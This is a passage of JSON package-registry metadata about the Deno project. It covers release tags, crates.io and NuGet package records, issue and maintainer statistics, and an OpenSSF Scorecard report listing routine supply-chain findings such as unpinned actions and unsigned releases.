Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T13:36:09.780Z","dependent_packages_count":11,"downloads":605711,"downloads_period":"total","dependent_repos_count":31,"rankings":{"downloads":5.608873740544743,"dependent_repos_count":5.108702968297772,"dependent_packages_count":3.249594268149489,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.466802443518677},"purl":"pkg:cargo/deno_webstorage","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_webstorage","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_webstorage","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_webstorage/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:39.943Z","updated_at":"2022-11-07T18:29:39.943Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:29.748Z","updated_at":"2023-07-18T22:41:29.748Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13837793,"name":"ytdlp.deno.runtime","ecosystem":"nuget","description":"A NuGet package that provides the latest version of `deno.exe`.","homepage":"https://github.com/denoland/deno","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":["yt-dlp","deno","deno.exe","runtime","javascript","youtube","youtube-dl","external-runtime"],"namespace":null,"versions_count":2,"first_release_published_at":"1900-01-01T00:00:00.000Z","latest_release_published_at":"2026-08-29T21:56:44.639Z","latest_release_number":null,"last_synced_at":"2026-08-29T21:56:45.833Z","created_at":"2026-02-15T13:33:44.094Z","updated_at":"2026-08-31T13:36:09.847Z","registry_url":"https://www.nuget.org/packages/ytdlp.deno.runtime/","install_command":"Install-Package ytdlp.deno.runtime","documentation_url":null,"metadata":{"copyright":"Copyright © 2026 ManuHub","license_info":{"type":"file","text":"LICENSE.txt","version":null},"license_url":"https://aka.ms/deprecateLicenseUrl","require_license_acceptance":false,"icon":"icon.png","readme":"README.md","repository":{"type":"git","url":"https://github.com/manusoft/Ytdlp-Builds","branch":null,"commit":"766964df63d0a7faefb11582ef932608e4ccc713"},"development_dependency":true,"serviceable":false,"framework_assemblies":[],"package_types":[],"dependency_summary":{"total_dependency_groups":1,"target_frameworks":[".NETStandard2.1"],"total_dependencies":0}},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using 